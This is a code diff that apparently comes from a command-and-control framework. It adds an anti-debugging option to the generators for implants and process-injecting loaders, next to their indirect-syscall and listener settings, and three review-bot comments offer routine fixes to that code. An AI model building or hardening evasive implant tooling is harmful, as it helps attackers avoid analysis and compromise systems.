0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x44, 0x65, 0x6c, 0x65, + 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, + 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x39, 0x0a, 0x14, 0x4c, 0x69, 0x73, + 0x74, 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, - 0x67, 0x65, 0x22, 0x00, 0x12, 0x37, 0x0a, 0x12, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, - 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, - 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x39, 0x0a, - 0x14, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, - 0x73, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, - 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x49, 0x0a, 0x1a, 0x4c, 0x69, 0x73, 0x74, - 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x44, 0x65, 0x6c, 0x65, - 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, 0x16, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, - 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x1a, 0x11, - 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, - 0x65, 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0f, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x47, - 0x65, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 
0x6d, 0x6d, 0x6f, 0x6e, 0x70, - 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, - 0x74, 0x65, 0x6e, 0x65, 0x72, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4c, 0x69, 0x73, 0x74, 0x65, - 0x6e, 0x65, 0x72, 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, - 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, - 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, - 0x43, 0x0a, 0x16, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, - 0x74, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x15, 0x2e, 0x72, 0x70, 0x63, 0x70, - 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, - 0x1a, 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, - 0x72, 0x79, 0x22, 0x00, 0x12, 0x41, 0x0a, 0x15, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, - 0x6f, 0x61, 0x64, 0x65, 0x72, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x14, 0x2e, - 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, 0x61, - 0x64, 0x65, 0x72, 0x1a, 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, - 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x18, 0x50, 0x61, 0x79, 0x6c, 0x6f, - 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x47, 0x65, 0x6e, 0x65, 0x72, - 0x61, 0x74, 0x65, 0x12, 0x17, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, - 0x6f, 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x1a, 0x10, 0x2e, 0x63, - 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, - 0x12, 0x34, 0x0a, 0x0f, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, - 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, - 0x64, 
0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, - 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x2c, 0x0a, 0x0c, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, - 0x65, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, - 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, - 0x6e, 0x74, 0x22, 0x00, 0x12, 0x30, 0x0a, 0x0b, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, 0x65, 0x74, - 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, - 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, - 0x6e, 0x74, 0x22, 0x00, 0x30, 0x01, 0x12, 0x35, 0x0a, 0x0d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x54, - 0x61, 0x73, 0x6b, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, - 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x36, 0x0a, - 0x12, 0x54, 0x61, 0x73, 0x6b, 0x53, 0x65, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, - 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, - 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, - 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x14, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6c, 0x65, - 0x61, 0x72, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, - 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, + 0x67, 0x65, 0x22, 0x00, 0x12, 0x49, 0x0a, 0x1a, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, + 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, + 0x49, 0x64, 0x12, 0x16, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, + 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 
0x6f, 0x61, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, - 0x37, 0x0a, 0x13, 0x54, 0x61, 0x73, 0x6b, 0x4c, 0x69, 0x73, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, - 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, - 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x2e, 0x0a, 0x0a, 0x4c, 0x6f, 0x6f, 0x74, - 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, - 0x6f, 0x6f, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x14, 0x4c, 0x6f, 0x6f, 0x74, - 0x43, 0x6c, 0x65, 0x61, 0x72, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, - 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x6f, 0x6f, 0x74, 0x1a, 0x11, 0x2e, + 0x32, 0x0a, 0x0f, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x47, 0x65, 0x74, 0x42, 0x79, + 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, + 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, + 0x72, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x47, + 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, + 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, + 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, 0x43, 0x0a, 0x16, 0x50, + 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x47, 0x65, 0x6e, + 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x15, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, + 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x1a, 0x10, 
0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, + 0x12, 0x41, 0x0a, 0x15, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, 0x61, 0x64, 0x65, + 0x72, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x14, 0x2e, 0x72, 0x70, 0x63, 0x70, + 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x1a, + 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, + 0x79, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x18, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x53, 0x68, + 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, + 0x17, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x53, + 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x1a, 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, + 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, 0x12, 0x34, 0x0a, 0x0f, + 0x41, 0x67, 0x65, 0x6e, 0x74, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, + 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x22, 0x00, 0x42, 0x5c, 0x0a, 0x1e, 0x6f, 0x72, 0x67, 0x2e, 0x68, 0x64, 0x6b, 0x73, 0x2e, 0x68, - 0x65, 0x72, 0x6d, 0x69, 0x74, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x72, - 0x70, 0x63, 0x70, 0x62, 0x42, 0x08, 0x52, 0x50, 0x43, 0x50, 0x72, 0x6f, 0x74, 0x6f, 0x50, 0x01, - 0x5a, 0x2e, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x68, 0x69, 0x64, - 0x65, 0x63, 0x6b, 0x69, 0x65, 0x73, 0x2f, 0x68, 0x65, 0x72, 0x6d, 0x69, 0x74, 0x2f, 0x70, 0x6b, - 0x67, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, 0x72, 0x70, 0x63, 0x70, 0x62, - 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, + 0x22, 0x00, 0x12, 0x2c, 0x0a, 0x0c, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, 
0x65, 0x74, 0x42, 0x79, + 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, + 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x22, 0x00, + 0x12, 0x30, 0x0a, 0x0b, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, + 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, + 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x22, 0x00, + 0x30, 0x01, 0x12, 0x35, 0x0a, 0x0d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4c, + 0x69, 0x73, 0x74, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, + 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x12, 0x54, 0x61, 0x73, + 0x6b, 0x53, 0x65, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, + 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, + 0x00, 0x12, 0x38, 0x0a, 0x14, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6c, 0x65, 0x61, 0x72, 0x42, 0x79, + 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, + 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, + 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x37, 0x0a, 0x13, 0x54, + 0x61, 0x73, 0x6b, 0x4c, 0x69, 0x73, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, + 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, + 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, + 0x67, 0x65, 0x22, 0x00, 0x12, 0x2e, 0x0a, 0x0a, 0x4c, 0x6f, 0x6f, 0x74, 0x47, 0x65, 0x74, 0x41, + 0x6c, 0x6c, 
0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x6f, 0x6f, 0x74, 0x1a, + 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, + 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x14, 0x4c, 0x6f, 0x6f, 0x74, 0x43, 0x6c, 0x65, 0x61, + 0x72, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, + 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x6f, 0x6f, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, + 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x42, 0x5c, + 0x0a, 0x1e, 0x6f, 0x72, 0x67, 0x2e, 0x68, 0x64, 0x6b, 0x73, 0x2e, 0x68, 0x65, 0x72, 0x6d, 0x69, + 0x74, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, + 0x42, 0x08, 0x52, 0x50, 0x43, 0x50, 0x72, 0x6f, 0x74, 0x6f, 0x50, 0x01, 0x5a, 0x2e, 0x67, 0x69, + 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x68, 0x69, 0x64, 0x65, 0x63, 0x6b, 0x69, + 0x65, 0x73, 0x2f, 0x68, 0x65, 0x72, 0x6d, 0x69, 0x74, 0x2f, 0x70, 0x6b, 0x67, 0x2f, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, 0x72, 0x70, 0x63, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x33, } var ( diff --git a/pkg/protobuf/rpcpb/rpc.proto b/pkg/protobuf/rpcpb/rpc.proto index 7f60339..483ca27 100644 --- a/pkg/protobuf/rpcpb/rpc.proto +++ b/pkg/protobuf/rpcpb/rpc.proto @@ -90,6 +90,7 @@ message PayloadImplant { int64 jitter = 12; int64 killDate = 13; bool indirectSyscalls = 14; + bool antiDebug = 15; } message PayloadLoader { @@ -106,6 +107,7 @@ message PayloadLoader { string technique = 11; string processToInject = 12; bool indirectSyscalls = 13; + bool antiDebug = 14; } message PayloadShellcode { diff --git a/pkg/server/payload/implant.go b/pkg/server/payload/implant.go index d37a5c1..7d42c83 100644 --- a/pkg/server/payload/implant.go +++ b/pkg/server/payload/implant.go 
@@ -38,6 +38,7 @@ type Implant struct {
 Jitter uint
 KillDate uint
 IndirectSyscalls bool
+ AntiDebug bool
 }
 
 func NewImplant(
@@ -55,6 +56,7 @@ func NewImplant(
 jitter uint,
 killDate uint,
 indirectSyscalls bool,
+ antiDebug bool,
 ) *Implant {
 if _uuid == "" {
 _uuid = uuid.NewString()
@@ -78,6 +80,7 @@ func NewImplant(
 Jitter: jitter,
 KillDate: killDate,
 IndirectSyscalls: indirectSyscalls,
+ AntiDebug: antiDebug,
 }
 }
 
@@ -175,6 +178,7 @@ func (i *Implant) Generate(serverState *state.ServerState) (data []byte, outFile
 fmt.Sprintf("-DPAYLOAD_JITTER=%s", fmt.Sprint(i.Jitter)),
 fmt.Sprintf("-DPAYLOAD_KILLDATE=%s", fmt.Sprint(i.KillDate)),
 fmt.Sprintf("-DPAYLOAD_INDIRECT_SYSCALLS=%t", i.IndirectSyscalls),
+ fmt.Sprintf("-DPAYLOAD_ANTI_DEBUG=%t", i.AntiDebug),
 fmt.Sprintf("-DLISTENER_PROTOCOL=\"%s\"", i.Lprotocol),
 fmt.Sprintf("-DLISTENER_HOST=\"%s\"", i.Lhost),
 fmt.Sprintf("-DLISTENER_PORT=%s", fmt.Sprint(i.Lport)),
diff --git a/pkg/server/payload/loader.go b/pkg/server/payload/loader.go
index b32583c..cccb441 100644
--- a/pkg/server/payload/loader.go
+++ b/pkg/server/payload/loader.go
@@ -29,6 +29,7 @@ type Loader struct {
 Technique string
 ProcessToInject string
 IndirectSyscalls bool
+ AntiDebug bool
 }
 
 func NewLoader(
@@ -45,6 +46,7 @@ func NewLoader(
 technique string,
 processToInject string,
 indirectSyscalls bool,
+ antiDebug bool,
 ) *Loader {
 if _uuid == "" {
 _uuid = uuid.NewString()
@@ -67,6 +69,7 @@ func NewLoader(
 Technique: technique,
 ProcessToInject: processToInject,
 IndirectSyscalls: indirectSyscalls,
+ AntiDebug: antiDebug,
 }
 }
 
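Review bot: `antiDebug bool` is added directly after `indirectSyscalls bool` in the positional parameter list of `NewImplant` (second hunk of implant.go), and the same pairing is added to `NewLoader` in loader.go. The grpc.go call sites pass `imp.IndirectSyscalls, imp.AntiDebug` and `ldr.IndirectSyscalls, ldr.AntiDebug` by position. Two adjacent parameters of the same type can be swapped at a call site without any compile error, and the wrong build flag would then be set silently. A parameter struct with named fields would make each flag explicit, for example `func NewImplant(opts ImplantOptions) *Implant` (the type name is illustrative, not an existing one). Both signatures start outside their hunks, so the full parameter lists are not visible here.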
@@ -161,6 +164,7 @@ func (l *Loader) Generate(serverState *state.ServerState) (data []byte, outFile
 fmt.Sprintf("-DPAYLOAD_TECHNIQUE=\"%s\"", l.Technique),
 fmt.Sprintf("-DPAYLOAD_PROCESS_TO_INJECT=\"%s\"", l.ProcessToInject),
 fmt.Sprintf("-DPAYLOAD_INDIRECT_SYSCALLS=%t", l.IndirectSyscalls),
+ fmt.Sprintf("-DPAYLOAD_ANTI_DEBUG=%t", l.AntiDebug),
 fmt.Sprintf("-DLISTENER_PROTOCOL=\"%s\"", l.Lprotocol),
 fmt.Sprintf("-DLISTENER_HOST=\"%s\"", l.Lhost),
 fmt.Sprintf("-DLISTENER_PORT=%s", fmt.Sprint(l.Lport)),
diff --git a/pkg/server/rpc/grpc.go b/pkg/server/rpc/grpc.go
index cd2897e..49f73bd 100644
--- a/pkg/server/rpc/grpc.go
+++ b/pkg/server/rpc/grpc.go
@@ -310,6 +310,7 @@ func (s *HermitRPCServer) PayloadImplantGenerate(
 uint(imp.Jitter),
 uint(imp.KillDate),
 imp.IndirectSyscalls,
+ imp.AntiDebug,
 )
 data, _, err := newImp.Generate(s.serverState)
 if err != nil {
@@ -336,6 +337,7 @@ func (s *HermitRPCServer) PayloadLoaderGenerate(
 ldr.Technique,
 ldr.ProcessToInject,
 ldr.IndirectSyscalls,
+ ldr.AntiDebug,
 )
 data, _, err := newStg.Generate(s.serverState)
 if err != nil {
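Review bot: The string-valued definitions around the added flag in `Loader.Generate` are built from request fields without escaping. `l.Technique` and `l.ProcessToInject` are wrapped in `\"%s\"`, and grpc.go passes `ldr.Technique` and `ldr.ProcessToInject` straight from the RPC message, so a value containing `"` or `\` changes the definition the build step receives. The new `-DPAYLOAD_ANTI_DEBUG=%t` line is not affected, since `%t` only prints `true` or `false`. Checking the strings before formatting would close this, e.g. `if strings.ContainsAny(l.ProcessToInject, "\"\\") { return nil, "", fmt.Errorf("invalid process name") }`, assuming `outFile` is a string, with an allow-list for `Technique`. Generate's body continues outside the hunk, so how the argument list is executed and whether validation happens elsewhere is not visible.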
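Review bot: In `PayloadImplantGenerate`, `uint(imp.Jitter)` and `uint(imp.KillDate)` convert signed wire values with no range check. rpc.proto declares both as `int64`, so a negative value from a client wraps to a very large unsigned number, which implant.go then formats into `-DPAYLOAD_JITTER` and `-DPAYLOAD_KILLDATE`. A guard ahead of the constructor call would reject it, e.g. `if imp.Jitter < 0 || imp.KillDate < 0 { return nil, fmt.Errorf("jitter and killDate must be non-negative") }`, assuming the handler returns a pointer and an error. The handler starts outside the hunk, so an earlier check may already exist.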